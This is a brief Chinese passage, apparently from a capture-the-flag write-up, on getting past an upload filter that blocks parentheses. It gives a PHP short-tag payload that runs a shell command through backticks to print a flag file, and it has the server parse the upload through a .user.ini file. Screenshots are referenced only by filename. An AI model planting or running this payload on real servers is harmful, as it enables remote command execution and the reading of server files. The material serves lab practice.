1. 在上面基础上,过滤了()
    2. 利用反引号,达到命令执行效果

      1. <?= `tac ../fl*`?>

      image-20210720154516534.png

    3. 配合.user.ini进行解析,访问页面

    image-20210720154606404.png